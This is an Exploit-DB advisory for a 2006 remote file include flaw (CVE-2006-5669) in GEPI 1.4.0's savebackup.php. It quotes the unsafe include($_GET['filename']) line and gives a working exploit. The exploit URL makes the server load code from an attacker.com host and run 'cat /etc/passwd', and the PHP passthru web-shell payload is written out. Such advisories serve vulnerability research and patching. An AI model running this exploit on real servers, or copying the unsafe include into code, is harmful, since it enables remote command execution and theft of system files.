GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability

2006-10-31T00:00:00
ID EDB-ID:2692
Type exploitdb
Reporter Sumit Siddharth
Modified 2006-10-31T00:00:00

Description

GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability. CVE-2006-5669. Webapps exploit for php platform

                                        
                                            Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
&lt;? passthru("$_GET[cmd]");?&gt;

Credits:-
$um$id

# milw0rm.com [2006-10-31]